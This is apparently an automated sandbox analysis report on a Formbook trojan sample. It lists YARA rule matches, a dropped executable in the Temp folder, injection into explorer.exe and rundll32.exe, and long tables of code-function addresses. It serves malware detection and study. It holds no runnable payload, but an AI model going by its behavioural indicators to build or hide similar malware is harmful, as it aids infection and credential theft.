Source: Process Memory Space: xheuzyg.exe PID: 1664, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 4312, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe

Code function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_0040312A

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe	Code function: 0_2_00406354	0_2_00406354
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe	Code function: 0_2_00404802	0_2_00404802
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe	Code function: 0_2_00406B2B	0_2_00406B2B
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 2_2_001B385E	2_2_001B385E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 2_2_001B40C8	2_2_001B40C8
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 2_2_001C40C5	2_2_001C40C5
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 2_2_001AFA47	2_2_001AFA47
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 2_2_001B3446	2_2_001B3446
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 2_2_001B3C93	2_2_001B3C93
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 2_2_001BF510	2_2_001BF510
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 2_2_001BFD59	2_2_001BFD59
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 2_2_001B1600	2_2_001B1600
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 2_2_001B2F4A	2_2_001B2F4A
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 2_2_013808B7	2_2_013808B7
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 2_2_01380A42	2_2_01380A42
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_001B385E	4_2_001B385E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_001B40C8	4_2_001B40C8
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_001C40C5	4_2_001C40C5
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_001AFA47	4_2_001AFA47
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_001B3446	4_2_001B3446
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_001B3C93	4_2_001B3C93
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_001BF510	4_2_001BF510
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_001BFD59	4_2_001BFD59
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_001B1600	4_2_001B1600
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_001B2F4A	4_2_001B2F4A
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0041D825	4_2_0041D825
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_00401026	4_2_00401026
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_00401030	4_2_00401030
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0041DA1D	4_2_0041DA1D
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0041DAE7	4_2_0041DAE7
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0041ED3D	4_2_0041ED3D
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_00402D90	4_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0041D593	4_2_0041D593
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0041DD97	4_2_0041DD97
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_00409E4C	4_2_00409E4C
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_00409E50	4_2_00409E50
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_00402FB0	4_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01658158	4_2_01658158
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C0100	4_2_015C0100
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166A118	4_2_0166A118
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016881CC	4_2_016881CC
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016901AA	4_2_016901AA
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016841A2	4_2_016841A2
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01662000	4_2_01662000
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0168A352	4_2_0168A352
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016903E6	4_2_016903E6
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015DE3F0	4_2_015DE3F0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01670274	4_2_01670274
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016502C0	4_2_016502C0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0535	4_2_015D0535
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01690591	4_2_01690591
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01682446	4_2_01682446
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01674420	4_2_01674420
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0167E4F6	4_2_0167E4F6
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F4750	4_2_015F4750
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0770	4_2_015D0770
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015CC7C0	4_2_015CC7C0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EC6E0	4_2_015EC6E0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E6962	4_2_015E6962
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0169A9A6	4_2_0169A9A6
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D29A0	4_2_015D29A0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015DA840	4_2_015DA840
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D2840	4_2_015D2840
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FE8F0	4_2_015FE8F0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015B68B8	4_2_015B68B8
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0168AB40	4_2_0168AB40
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01686BD7	4_2_01686BD7
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015CEA80	4_2_015CEA80
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015DAD00	4_2_015DAD00
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166CD1F	4_2_0166CD1F
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015CADE0	4_2_015CADE0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E8DBF	4_2_015E8DBF
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0C00	4_2_015D0C00
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C0CF2	4_2_015C0CF2
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01670CB5	4_2_01670CB5
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01644F40	4_2_01644F40
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01612F28	4_2_01612F28
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01672F30	4_2_01672F30
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F0F30	4_2_015F0F30
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C2FC8	4_2_015C2FC8
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015DCFE0	4_2_015DCFE0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0164EFA0	4_2_0164EFA0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0E59	4_2_015D0E59
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0168EE26	4_2_0168EE26
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0168EEDB	4_2_0168EEDB
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E2E90	4_2_015E2E90
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0168CE93	4_2_0168CE93
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0169B16B	4_2_0169B16B
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0160516C	4_2_0160516C
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015BF172	4_2_015BF172
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015DB1B0	4_2_015DB1B0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016870E9	4_2_016870E9
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0168F0E0	4_2_0168F0E0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D70C0	4_2_015D70C0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0167F0CC	4_2_0167F0CC
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015BD34C	4_2_015BD34C
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0168132D	4_2_0168132D
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0161739A	4_2_0161739A
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016712ED	4_2_016712ED
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EB2C0	4_2_015EB2C0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D52A0	4_2_015D52A0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01687571	4_2_01687571
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016995C3	4_2_016995C3
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166D5B0	4_2_0166D5B0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C1460	4_2_015C1460
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0168F43F	4_2_0168F43F
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0168F7B0	4_2_0168F7B0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01615630	4_2_01615630
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016816CC	4_2_016816CC
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D9950	4_2_015D9950
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EB950	4_2_015EB950
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01665910	4_2_01665910
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0163D800	4_2_0163D800
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D38E0	4_2_015D38E0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0168FB76	4_2_0168FB76
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01645BF0	4_2_01645BF0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0160DBF9	4_2_0160DBF9
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EFB80	4_2_015EFB80
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01643A6C	4_2_01643A6C
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0168FA49	4_2_0168FA49
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01687A46	4_2_01687A46
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0167DAC6	4_2_0167DAC6
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01615AA0	4_2_01615AA0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01671AA3	4_2_01671AA3
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166DAAC	4_2_0166DAAC
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01687D73	4_2_01687D73
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D3D40	4_2_015D3D40
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01681D5A	4_2_01681D5A
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EFDC0	4_2_015EFDC0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01649C32	4_2_01649C32
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0168FCF2	4_2_0168FCF2
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0168FF09	4_2_0168FF09
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D1F92	4_2_015D1F92
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0168FFB1	4_2_0168FFB1
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D9EB0	4_2_015D9EB0
Source: C:\Windows\explorer.exe	Code function: 5_2_10B4F232	5_2_10B4F232
Source: C:\Windows\explorer.exe	Code function: 5_2_10B45082	5_2_10B45082
Source: C:\Windows\explorer.exe	Code function: 5_2_10B4E036	5_2_10B4E036
Source: C:\Windows\explorer.exe	Code function: 5_2_10B525CD	5_2_10B525CD
Source: C:\Windows\explorer.exe	Code function: 5_2_10B49B30	5_2_10B49B30
Source: C:\Windows\explorer.exe	Code function: 5_2_10B49B32	5_2_10B49B32
Source: C:\Windows\explorer.exe	Code function: 5_2_10B4C912	5_2_10B4C912
Source: C:\Windows\explorer.exe	Code function: 5_2_10B46D02	5_2_10B46D02
Source: C:\Windows\explorer.exe	Code function: 5_2_111E3912	5_2_111E3912
Source: C:\Windows\explorer.exe	Code function: 5_2_111DDD02	5_2_111DDD02
Source: C:\Windows\explorer.exe	Code function: 5_2_111E95CD	5_2_111E95CD
Source: C:\Windows\explorer.exe	Code function: 5_2_111E5036	5_2_111E5036
Source: C:\Windows\explorer.exe	Code function: 5_2_111DC082	5_2_111DC082
Source: C:\Windows\explorer.exe	Code function: 5_2_111E0B32	5_2_111E0B32
Source: C:\Windows\explorer.exe	Code function: 5_2_111E0B30	5_2_111E0B30
Source: C:\Windows\explorer.exe	Code function: 5_2_111E6232	5_2_111E6232
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044B2446	6_2_044B2446
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044A4420	6_2_044A4420
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044AE4F6	6_2_044AE4F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04400535	6_2_04400535
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044C0591	6_2_044C0591
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0441C6E0	6_2_0441C6E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04424750	6_2_04424750
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04400770	6_2_04400770
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_043FC7C0	6_2_043FC7C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04492000	6_2_04492000
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04488158	6_2_04488158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_043F0100	6_2_043F0100
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0449A118	6_2_0449A118
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044B81CC	6_2_044B81CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044C01AA	6_2_044C01AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044B41A2	6_2_044B41A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044A0274	6_2_044A0274
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044802C0	6_2_044802C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044BA352	6_2_044BA352
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044C03E6	6_2_044C03E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0440E3F0	6_2_0440E3F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04400C00	6_2_04400C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_043F0CF2	6_2_043F0CF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044A0CB5	6_2_044A0CB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0440AD00	6_2_0440AD00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0449CD1F	6_2_0449CD1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_043FADE0	6_2_043FADE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04418DBF	6_2_04418DBF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04400E59	6_2_04400E59
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044BEE26	6_2_044BEE26
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044BEEDB	6_2_044BEEDB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04412E90	6_2_04412E90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044BCE93	6_2_044BCE93
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04474F40	6_2_04474F40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04442F28	6_2_04442F28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04420F30	6_2_04420F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044A2F30	6_2_044A2F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0440CFE0	6_2_0440CFE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0447EFA0	6_2_0447EFA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_043F2FC8	6_2_043F2FC8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0440A840	6_2_0440A840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04402840	6_2_04402840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_043E68B8	6_2_043E68B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0442E8F0	6_2_0442E8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04416962	6_2_04416962
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044029A0	6_2_044029A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044CA9A6	6_2_044CA9A6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_043FEA80	6_2_043FEA80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044BAB40	6_2_044BAB40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044B6BD7	6_2_044B6BD7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_043F1460	6_2_043F1460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044BF43F	6_2_044BF43F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044B7571	6_2_044B7571
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044C95C3	6_2_044C95C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0449D5B0	6_2_0449D5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04445630	6_2_04445630
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044B16CC	6_2_044B16CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044BF7B0	6_2_044BF7B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044070C0	6_2_044070C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044AF0CC	6_2_044AF0CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044B70E9	6_2_044B70E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044BF0E0	6_2_044BF0E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044CB16B	6_2_044CB16B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0443516C	6_2_0443516C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_043EF172	6_2_043EF172
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0440B1B0	6_2_0440B1B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0441B2C0	6_2_0441B2C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044A12ED	6_2_044A12ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044052A0	6_2_044052A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044B132D	6_2_044B132D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_043ED34C	6_2_043ED34C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0444739A	6_2_0444739A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04479C32	6_2_04479C32
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044BFCF2	6_2_044BFCF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04403D40	6_2_04403D40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044B1D5A	6_2_044B1D5A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044B7D73	6_2_044B7D73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0441FDC0	6_2_0441FDC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04409EB0	6_2_04409EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044BFF09	6_2_044BFF09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04401F92	6_2_04401F92
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044BFFB1	6_2_044BFFB1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0446D800	6_2_0446D800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044038E0	6_2_044038E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04409950	6_2_04409950
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0441B950	6_2_0441B950
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04495910	6_2_04495910
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044BFA49	6_2_044BFA49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044B7A46	6_2_044B7A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04473A6C	6_2_04473A6C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044ADAC6	6_2_044ADAC6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04445AA0	6_2_04445AA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0449DAAC	6_2_0449DAAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044A1AA3	6_2_044A1AA3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044BFB76	6_2_044BFB76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04475BF0	6_2_04475BF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0443DBF9	6_2_0443DBF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0441FB80	6_2_0441FB80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0013ED3D	6_2_0013ED3D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_00122D90	6_2_00122D90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_00122FB0	6_2_00122FB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_00129E50	6_2_00129E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_00129E4C	6_2_00129E4C

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 043EB970 appears 277 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 0447F290 appears 105 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04447E54 appears 111 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04435130 appears 58 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 0446EA12 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: String function: 001BCC67 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: String function: 0163EA12 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: String function: 001B68AE appears 46 times
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: String function: 0164F290 appears 105 times
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: String function: 015BB970 appears 277 times
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: String function: 001B0BE0 appears 102 times
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: String function: 01617E54 appears 111 times
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: String function: 01605130 appears 58 times

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0041A350 NtCreateFile,	4_2_0041A350
